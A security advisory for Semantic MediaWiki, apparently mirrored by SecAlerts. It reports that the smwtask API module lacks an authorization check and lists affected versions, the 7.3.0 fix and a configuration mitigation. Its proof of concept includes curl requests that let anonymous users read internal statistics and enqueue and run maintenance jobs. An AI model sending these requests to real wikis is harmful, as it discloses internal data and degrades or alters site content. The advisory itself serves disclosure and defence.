GHSA-jr78-w6w5-m8f8: CSRF

Published Sep 18, 2026
·
Updated

Summary

The api.php?action=smwtask API module performs no authorization check. The equivalent maintenance interface in the web UI (Special:SMWAdmin) requires the smw-admin right, but the API module that backs several of the same operations enforces nothing. An unauthenticated visitor can therefore retrieve internal Semantic MediaWiki database statistics and reach state-changing maintenance operations that are intended to be administrator-only.

Details

SMW\MediaWiki\Api\Task::execute() (src/MediaWiki/Api/Task.php) reads the request parameters, resolves a task through TaskFactory, and runs it. It contains no permission check — no smw-admin, no checkUserRightsAny(), no per-task right.

The only gates on the module are:

- needsToken( 'csrf' ) — this is not authorization. MediaWiki issues anonymous users a fixed, public CSRF token (+\), so any unauthenticated caller satisfies the token check. It defends logged-in users against CSRF; it does nothing against a direct anonymous request. - mustBePosted() / isWriteMode() — do not gate on group membership.

By contrast, Special:SMWAdmin restricts access via parent::construct( 'SMWAdmin', 'smw-admin' ) and raises PermissionsError when the smw-admin right is absent. The API path bypasses that restriction entirely.

Tasks reachable anonymously through the module include:

- table-statistics, duplicate-lookup — return internal store statistics and enumerate the internal object-ID space (intended to be behind Special:SMWAdmin → Supplementary functions). - insert-job — enqueues any Semantic MediaWiki job type (including smw.fulltextSearchTableRebuild, smw.propertyStatisticsRebuild, smw.entityIdDisposer) for an arbitrary title. - update, check-query, run-joblist — run update jobs and #ask queries synchronously within the request; run-joblist pops and executes queued jobs inline.

Because the read tasks disclose the internal object-ID space and insert-job can enqueue smw.entityIdDisposer with a specific id parameter, the exposure extends beyond information disclosure and resource consumption to targeted modification of stored semantic data.

Proof of concept

On a default installation, as an unauthenticated visitor:

1. Obtain the anonymous CSRF token (the fixed public value "+\") curl -s 'https://HOST/api.php?action=query&meta=tokens&type=csrf&format=json' -> {"query":{"tokens":{"csrftoken":"+\\"}}}

2. Read internal database statistics — HTTP 200 with the data curl -s -H 'Content-Type: application/x-www-form-urlencoded' \ --data-raw 'action=smwtask&task=table-statistics&params={}&token=%2B%5C&format=json' \ 'https://HOST/api.php' -> {"task":{"list":{"smwobjectids":{"totalrowcount":49,"lastid":516,...

3. Enqueue a maintenance job (state-changing) curl -s --data-urlencode 'action=smwtask' --data-urlencode 'task=insert-job' \ --data-urlencode 'params={"subject":"MainPage#0##","job":"smw.fulltextSearchTableRebuild","parameters":{"mode":"full"}}' \ --data-urlencode 'token=+\' --data-urlencode 'format=json' 'https://HOST/api.php' -> {"task":{"done":""}} (job now present in the queue)

4. Execute queued jobs synchronously in the anonymous request curl -s --data-urlencode 'action=smwtask' --data-urlencode 'task=run-joblist' \ --data-urlencode 'params={"subject":"MainPage#0##","jobs":{"smw.fulltextSearchTableRebuild":1}}' \ --data-urlencode 'token=+\' --data-urlencode 'format=json' 'https://HOST/api.php' -> {"task":{"done":"","log":{"smw.fulltextSearchTableRebuild":["MainPage"]}}}

Reproduced on master against a default install, with the requester confirmed anonymous (action=query&meta=userinfo returned {"id":0,"anon":""}).

Impact

An unauthenticated attacker can:

- Retrieve internal Semantic MediaWiki database statistics — row counts, the last/highest internal object ID, per-namespace breakdowns, and blob term statistics — and enumerate the internal object-ID space. - Enqueue arbitrary Semantic MediaWiki maintenance jobs and force synchronous execution of update jobs, #ask queries, and queued jobs, degrading wiki performance. - Reach entity-disposal operations against enumerated object IDs, affecting the integrity of stored semantic data.

Practical severity depends on deployment: the disclosed statistics are more sensitive on a populated wiki, and the performance and integrity impact scales with store size and job cost.

Affected versions

All releases that ship the smwtask API module (introduced in 3.x) up to and including the current release.

Mitigation

Upgrading to 7.3.0+ or apply a local patch in localSettings.php to disable the endpoint if you can't update: php $wgExtensionFunctions[] = static function () { unset( $GLOBALS['wgAPIModules']['smwtask'] ); };

Affected Software

1 affected componentFixes available
composer/mediawiki/semantic-media-wiki>=3.0.0<=7.2.1
7.3.0

Remediation

Recommended actions to resolve this vulnerability, in priority order.

  1. Upgrade

    Upgrade composer/mediawiki/semantic-media-wiki to a version that resolves this vulnerability.

    Fixed in 7.3.0
  2. Upgrade

    Upgrade Semantic MediaWiki (SMW) to a version that resolves this vulnerability.

    Fixed in 7.3.0
  3. Configuration

    In localSettings.php (or equivalent), disable the unauthenticated 'smwtask' API module by unsetting the endpoint, e.g. unset($GLOBALS['wgAPIModules']['smwtask']).

    Semantic MediaWiki (SMW) — localSettings.php $wgAPIModules['smwtask'] (unset $GLOBALS['wgAPIModules']['smwtask']) = disabled

Event History

Sep 18, 2026
Advisory Published
via GitHub·04:59 PM
Data Sourced
via GitHub·04:59 PM
DescriptionSeverityWeaknessAffected Software

Frequently Asked Questions

1

What access does an attacker need to use the affected API operations?

No authentication or special group membership is required. An unauthenticated caller can satisfy the CSRF-token requirement because MediaWiki provides anonymous users a fixed public token, and POST/write-mode requirements do not enforce authorization.

2

What kinds of operations can an unauthenticated caller reach?

They can retrieve internal Semantic MediaWiki database statistics and invoke state-changing maintenance operations intended for administrators. The equivalent web interface requires the smw-admin right, but the API module does not enforce that right or another per-task permission check.

3

Does requiring a CSRF token protect this API module from direct anonymous requests?

No. The CSRF token protects logged-in users from cross-site request forgery, but it is not an authorization control here because anonymous callers can use the public fixed token.

Contact

SecAlerts Pty Ltd.
132 Wickham Terrace
Fortitude Valley,
QLD 4006, Australia
info@secalerts.co
By using SecAlerts services, you agree to our services end-user license agreement. This website is safeguarded by reCAPTCHA and governed by the Google Privacy Policy and Terms of Service. All names, logos, and brands of products are owned by their respective owners, and any usage of these names, logos, and brands for identification purposes only does not imply endorsement. If you possess any content that requires removal, please get in touch with us.
© 2026 SecAlerts Pty Ltd.
ABN: 70 645 966 203, ACN: 645 966 203